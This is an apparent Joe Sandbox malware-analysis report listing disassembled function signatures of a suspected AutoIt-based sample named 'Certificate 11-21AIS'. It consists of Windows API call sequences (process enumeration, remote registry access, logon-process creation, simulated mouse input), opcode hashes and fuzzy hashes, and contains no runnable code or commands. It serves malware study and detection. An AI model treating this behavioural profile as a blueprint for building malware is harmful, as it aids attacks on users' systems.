                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 1038674560-2734436370
                                                                              • Opcode ID: d0fec90143d3b5253f9ba70590b2a5cc4edfc0828698cebfa69eb608a4d43652
                                                                              • Instruction ID: e3b614e33b66b80c6e4a9d6840723f07161e858ff284db5ccf62076345ab74c9
                                                                              • Opcode Fuzzy Hash: d0fec90143d3b5253f9ba70590b2a5cc4edfc0828698cebfa69eb608a4d43652
                                                                              • Instruction Fuzzy Hash: 26217C311041516BC730EB399C0AF7773ECFF65300F10442AF946D71C2E6659942C396
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009009CB
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009009F1
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 009009F4
                                                                              • SysAllocString.OLEAUT32 ref: 00900A15
                                                                              • SysFreeString.OLEAUT32 ref: 00900A1E
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00900A38
                                                                              • SysAllocString.OLEAUT32(?), ref: 00900A46
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: f353534ecaa06a8da0886085f460c439baa296379290e50ffda9c2103a505637
                                                                              • Instruction ID: c943ebcf171683b034813112d26a6fdcb030b4e024647a8fb5e21298d071ad60
                                                                              • Opcode Fuzzy Hash: f353534ecaa06a8da0886085f460c439baa296379290e50ffda9c2103a505637
                                                                              • Instruction Fuzzy Hash: 5B217479315204AFDB10DFA8DC88DAA77ECFF89360B008125F909CB2E1D674EC419B64
                                                                              APIs
                                                                                • Part of subcall function 008DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008DD1BA
                                                                                • Part of subcall function 008DD17C: GetStockObject.GDI32(00000011), ref: 008DD1CE
                                                                                • Part of subcall function 008DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008DD1D8
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0092A32D
                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0092A33A
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0092A345
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0092A354
                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0092A360
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 1025951953-3636473452
                                                                              • Opcode ID: 977240b3d4b20da98e65cc9ff56ef49107f586f293094613e10481492a86e42b
                                                                              • Instruction ID: f4a5469445ff7b26214760e8c3093365567109dfe23bb8699348064b8e8cb4fb
                                                                              • Opcode Fuzzy Hash: 977240b3d4b20da98e65cc9ff56ef49107f586f293094613e10481492a86e42b
                                                                              • Instruction Fuzzy Hash: 461193B2150229BFEF119FA4DC85EEB7F6DFF09798F014115BA08A6060C7729C21DBA4
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 008DCCF6
                                                                              • GetWindowRect.USER32(?,?), ref: 008DCD37
                                                                              • ScreenToClient.USER32(?,?), ref: 008DCD5F
                                                                              • GetClientRect.USER32(?,?), ref: 008DCE8C
                                                                              • GetWindowRect.USER32(?,?), ref: 008DCEA5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Client$Window$Screen
                                                                              • String ID:
                                                                              • API String ID: 1296646539-0
                                                                              • Opcode ID: 430c56b9ae32c155cd3c521dd0d9e8779f4b57c730d00bbba21deceec452fdb7
                                                                              • Instruction ID: 3b2484945c412b24c1b3357679a4a66fd8e1bf6379736affe006903e3f4793c6
                                                                              • Opcode Fuzzy Hash: 430c56b9ae32c155cd3c521dd0d9e8779f4b57c730d00bbba21deceec452fdb7
                                                                              • Instruction Fuzzy Hash: 10B1287990424ADBDF14CFA8C5807EEBBB5FF08314F14962AEC59EB250DB30A950DB64
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00921C18
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00921C26
                                                                              • __wsplitpath.LIBCMT ref: 00921C54
                                                                                • Part of subcall function 008E1DFC: __wsplitpath_helper.LIBCMT ref: 008E1E3C
                                                                              • _wcscat.LIBCMT ref: 00921C69
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00921CDF
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00921CF1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                              APIs
                                                                                • Part of subcall function 00923C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00922BB5,?,?), ref: 00923C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009230AF
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009230EF
                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00923112
                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0092313B
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0092317E
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0092318B
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                              APIs
                                                                              • GetMenu.USER32(?), ref: 00928540
                                                                              • GetMenuItemCount.USER32(00000000), ref: 00928577
                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0092859F
                                                                              • GetMenuItemID.USER32(?,?), ref: 0092860E
                                                                              • GetSubMenu.USER32(?,?), ref: 0092861C
                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0092866D
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00904B10
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00904B5B
                                                                              • IsMenu.USER32(00000000), ref: 00904B7B
                                                                              • CreatePopupMenu.USER32 ref: 00904BAF
                                                                              • GetMenuItemCount.USER32(000000FF), ref: 00904C0D
                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00904C3E
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                              APIs
                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0095DC00), ref: 00918E7C
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00918E89
                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00918EAD
                                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00918EC5
                                                                              • _strlen.LIBCMT ref: 00918EF7
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00918F6A
                                                                              Similarity
                                                                              • API ID: ErrorLast$_strlenselect
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • BeginPaint.USER32(?,?,?), ref: 008DAC2A
                                                                              • GetWindowRect.USER32(?,?), ref: 008DAC8E
                                                                              • ScreenToClient.USER32(?,?), ref: 008DACAB
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008DACBC
                                                                              • EndPaint.USER32(?,?,?,?,?), ref: 008DAD06
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0093E673
                                                                              Similarity
                                                                              • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                              APIs
                                                                              • ShowWindow.USER32(00981628,00000000,00981628,00000000,00000000,00981628,?,0093DC5D,00000000,?,00000000,00000000,00000000,?,0093DAD1,00000004), ref: 0092E40B
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0092E42F
                                                                              • ShowWindow.USER32(00981628,00000000), ref: 0092E48F
                                                                              • ShowWindow.USER32(00000000,00000004), ref: 0092E4A1
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0092E4C5
                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0092E4E8
                                                                              Similarity
                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 009098D1
                                                                                • Part of subcall function 008DF4EA: std::exception::exception.LIBCMT ref: 008DF51E
                                                                                • Part of subcall function 008DF4EA: __CxxThrowException@8.LIBCMT ref: 008DF533
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00909908
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00909924
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0090999E
                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009099B3
                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 009099D2
                                                                              Similarity
                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,009177F4,?,?,00000000,00000001), ref: 00919B53
                                                                                • Part of subcall function 00916544: GetWindowRect.USER32(?,?), ref: 00916557
                                                                              • GetDesktopWindow.USER32 ref: 00919B7D
                                                                              • GetWindowRect.USER32(00000000), ref: 00919B84
                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00919BB6
                                                                                • Part of subcall function 00907A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00907AD0
                                                                              • GetCursorPos.USER32(?), ref: 00919BE2
                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00919C44
                                                                              Similarity
                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008FAFAE
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 008FAFB5
                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008FAFC4
                                                                              • CloseHandle.KERNEL32(00000004), ref: 008FAFCF
                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008FAFFE
                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 008FB012
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: e31d1a79af13f73b34ae30113bbe52d5f85efc49ee33d44686ee59f20c683dde
• Instruction ID: d8540cbedd6e04ad7ac6d2eacc5debdc20f10dc31d2741a4ea5c2fa6184e4cc5
• Opcode Fuzzy Hash: e31d1a79af13f73b34ae30113bbe52d5f85efc49ee33d44686ee59f20c683dde
• Instruction Fuzzy Hash: A8218BB610520DAFCF128FA8DD09FAE7BA9FF49318F044015FA05E6161C7768D20EB61
APIs
  • Part of subcall function 008DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008DAFE3
  • Part of subcall function 008DAF83: SelectObject.GDI32(?,00000000), ref: 008DAFF2
  • Part of subcall function 008DAF83: BeginPath.GDI32(?), ref: 008DB009
  • Part of subcall function 008DAF83: SelectObject.GDI32(?,00000000), ref: 008DB033
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0092EC20
• LineTo.GDI32(00000000,00000003,?), ref: 0092EC34
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0092EC42
• LineTo.GDI32(00000000,00000000,?), ref: 0092EC52
• EndPath.GDI32(00000000), ref: 0092EC62
• StrokePath.GDI32(00000000), ref: 0092EC72
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: 99ec0fb75343b09b8c763c953785d3d9e5960883307056933afa89c5cf58b808
• Instruction ID: d168a6f46e2f24d52735eb8a7c8476b61f76e5ae4d0ae80ab1d8208bdd530858
• Opcode Fuzzy Hash: 99ec0fb75343b09b8c763c953785d3d9e5960883307056933afa89c5cf58b808
• Instruction Fuzzy Hash: D211097A005159BFEB129F90DC88EEA7F6DEF09350F148112BE488A160D7719D55EBA0
APIs
• GetDC.USER32(00000000), ref: 008FE1C0
• GetDeviceCaps.GDI32(00000000,00000058), ref: 008FE1D1
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 008FE1D8
• ReleaseDC.USER32(00000000,00000000), ref: 008FE1E0
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 008FE1F7
• MulDiv.KERNEL32(000009EC,?,?), ref: 008FE209
  • Part of subcall function 008F9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,008F9A05,00000000,00000000,?,008F9DDB), ref: 008FA53A
Similarity
• API ID: CapsDevice$ExceptionRaiseRelease
• String ID:
• API String ID: 603618608-0
• Opcode ID: 96a1f385a8fed1b583625d7597c31748649f76b4c52ef9cd832dc4b3d2efc4aa
• Instruction ID: 81e8348433b5d6ea07a534b6280a16c10ebb91b4994008fc6e9b68e9a99e2425
• Opcode Fuzzy Hash: 96a1f385a8fed1b583625d7597c31748649f76b4c52ef9cd832dc4b3d2efc4aa
• Instruction Fuzzy Hash: A4018FB9A01618BFEB109BB68C45F5EBFB8EB49751F004066EE04E7290D6709C00CBA0
APIs
• __init_pointers.LIBCMT ref: 008E7B47
  • Part of subcall function 008E123A: __initp_misc_winsig.LIBCMT ref: 008E125E
  • Part of subcall function 008E123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008E7F51
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008E7F65
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008E7F78
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008E7F8B
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008E7F9E
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008E7FB1
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008E7FC4
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008E7FD7
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008E7FEA
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008E7FFD
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008E8010
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008E8023
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008E8036
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008E8049
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008E805C
  • Part of subcall function 008E123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 008E806F
• __mtinitlocks.LIBCMT ref: 008E7B4C
  • Part of subcall function 008E7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0097AC68,00000FA0,?,?,008E7B51,008E5E77,00976C70,00000014), ref: 008E7E41
• __mtterm.LIBCMT ref: 008E7B55
  • Part of subcall function 008E7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,008E7B5A,008E5E77,00976C70,00000014), ref: 008E7D3F
  • Part of subcall function 008E7BBD: _free.LIBCMT ref: 008E7D46
  • Part of subcall function 008E7BBD: DeleteCriticalSection.KERNEL32(0097AC68,?,?,008E7B5A,008E5E77,00976C70,00000014), ref: 008E7D68
• __calloc_crt.LIBCMT ref: 008E7B7A
• GetCurrentThreadId.KERNEL32 ref: 008E7BA3
Similarity
• API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
• String ID:
• API String ID: 2942034483-0
• Opcode ID: 142d19ab9ab557b8fc1dfba3ee0f4bc1816da6faa402b355f285eeb6f5d9ff38
• Instruction ID: 5731d511570b32bf359c3b4dcd26dfb86482d4bc2297d31caf835a2d13436f98
• Opcode Fuzzy Hash: 142d19ab9ab557b8fc1dfba3ee0f4bc1816da6faa402b355f285eeb6f5d9ff38
• Instruction Fuzzy Hash: 35F0903212D3D219EA28777E7C06A8B2685FF43730B2006A9F964C91D2FF2088425162
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 008C281D
• MapVirtualKeyW.USER32(00000010,00000000), ref: 008C2825
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 008C2830
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 008C283B
• MapVirtualKeyW.USER32(00000011,00000000), ref: 008C2843
• MapVirtualKeyW.USER32(00000012,00000000), ref: 008C284B
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: b8b2d6a5a2724b731b6250bb8d0345e59d025b4419e2b5187c24721aadd688c2
• Instruction ID: 4fa80eac464a1789a59974943b0d7772092c6769268407018b6123062a80bca9
• Opcode Fuzzy Hash: b8b2d6a5a2724b731b6250bb8d0345e59d025b4419e2b5187c24721aadd688c2
• Instruction Fuzzy Hash: 5F0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
Similarity
• API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 1423608774-0
• Opcode ID: fba7fb767740a9512c2c5693605ab182ffed6f7a3e220b3e1c6b17d45718712f
• Instruction ID: cda8f4b1fbe308b5424bf85fb845c4b1a586948177bdb541d767554b312ae2f8
• Opcode Fuzzy Hash: fba7fb767740a9512c2c5693605ab182ffed6f7a3e220b3e1c6b17d45718712f
• Instruction Fuzzy Hash: 9601A43A317211AFDB292B58ED58EEB77A9FF89701B040529F503920E1DBB49800EB50
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00907C07
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00907C1D
• GetWindowThreadProcessId.USER32(?,?), ref: 00907C2C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00907C3B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00907C45
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00907C4C
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 367ef51cd90789a4af6ad733dd2fdde4bedc51ddee7ac32d69e9efd909d32c7e
• Instruction ID: 758b2d0458ed5517d113112744b94c00e1a72eebc447c6229479c75bc8921b5e
• Opcode Fuzzy Hash: 367ef51cd90789a4af6ad733dd2fdde4bedc51ddee7ac32d69e9efd909d32c7e
• Instruction Fuzzy Hash: 4EF0177A256158BBE6215B929C0EEEF7B7CEBCBB15F000018FA0591091D7A06A41E6B5
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00909A33
• EnterCriticalSection.KERNEL32(?,?,?,?,00935DEE,?,?,?,?,?,008CED63), ref: 00909A44
• TerminateThread.KERNEL32(?,000001F6,?,?,?,00935DEE,?,?,?,?,?,008CED63), ref: 00909A51
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00935DEE,?,?,?,?,?,008CED63), ref: 00909A5E
  • Part of subcall function 009093D1: CloseHandle.KERNEL32(?,?,00909A6B,?,?,?,00935DEE,?,?,?,?,?,008CED63), ref: 009093DB
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00909A71
• LeaveCriticalSection.KERNEL32(?,?,?,?,00935DEE,?,?,?,?,?,008CED63), ref: 00909A78
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: ec030cd0896244a0913d06207630e4f6d392e79a1d9d6e4186f52f6d5f2d9474
• Instruction ID: 311bff7da8785d96b9a1d4728a874d32e9b438e82b446cc59cadfc96a2832c3e
• Opcode Fuzzy Hash: ec030cd0896244a0913d06207630e4f6d392e79a1d9d6e4186f52f6d5f2d9474
• Instruction Fuzzy Hash: 16F05E3E25A211AFD7152BA4EC89EAA7769FF86301B140425F503910A5DBB59801EB50
APIs
  • Part of subcall function 008DF4EA: std::exception::exception.LIBCMT ref: 008DF51E
  • Part of subcall function 008DF4EA: __CxxThrowException@8.LIBCMT ref: 008DF533
• __swprintf.LIBCMT ref: 008C1EA6
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008C1D49
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 2125237772-557222456
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0091B006
                                                                              • CharUpperBuffW.USER32(?,?), ref: 0091B115
                                                                              • VariantClear.OLEAUT32(?), ref: 0091B298
                                                                                • Part of subcall function 00909DC5: VariantInit.OLEAUT32(00000000), ref: 00909E05
                                                                                • Part of subcall function 00909DC5: VariantCopy.OLEAUT32(?,?), ref: 00909E0E
                                                                                • Part of subcall function 00909DC5: VariantClear.OLEAUT32(?), ref: 00909E1A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                              • API String ID: 4237274167-1221869570
                                                                              APIs
                                                                                • Part of subcall function 008DC6F4: _wcscpy.LIBCMT ref: 008DC717
                                                                              • _memset.LIBCMT ref: 00905438
                                                                              • GetMenuItemInfoW.USER32(?), ref: 00905467
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00905513
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0090553D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 4152858687-4108050209
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0090027B
                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009002B1
